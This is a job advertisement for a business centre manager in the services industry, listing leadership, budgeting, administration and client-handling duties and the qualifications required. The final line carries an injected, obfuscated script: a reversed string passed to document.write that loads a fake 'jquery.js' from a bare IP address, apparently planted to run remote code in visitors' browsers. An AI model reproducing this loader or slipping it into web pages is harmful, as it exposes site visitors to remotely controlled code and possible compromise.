Industry : Services
• This is a strong leadership role and the candidate’s key role will be to motivate, drive and lead staff to ensure timely delivery to meet customers’ request.
• Possess excellent communication and customer relations skills.
• Accountable for business development, client management, contracts, pricing, service level management etc.
• Control and manage the budgets and financial position (cash flow, profitability, capex, etc) of the Business Centre.
• Responsible for all administration functions such as human resources, data processing, operating procedures, workflows, procurement, office maintenance, renovation, etc.
• Handle and resolve tenants/clients complaints and special request in a professional manner, ensuring prompt actions at all times.
• Work closely with all Strategic Partners including cross-selling of each other services, relationship building and communications.
• Require to have an analytical mind and have the ability to identify, propose and implement areas for improvement in relation to operations, human resource management, customer service and other administrative areas.
• To perform other duties or tasks as and when assigned.
• Diploma or Professional Degree in Business Studies/Administration/Management or Diploma/ Degree in Hospitality Management or equivalent.
• Minimum 3 years working experience in similar capacity. Candidates with experience in business development or hospitality/hotel industry are encouraged to apply.
• Good interpersonal and communication skills, a team player with strong work commitment
• Excellent organization skills, good leadership skills, self-motivated, able to work under pressure and meet datelines
• Full-Time position available. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))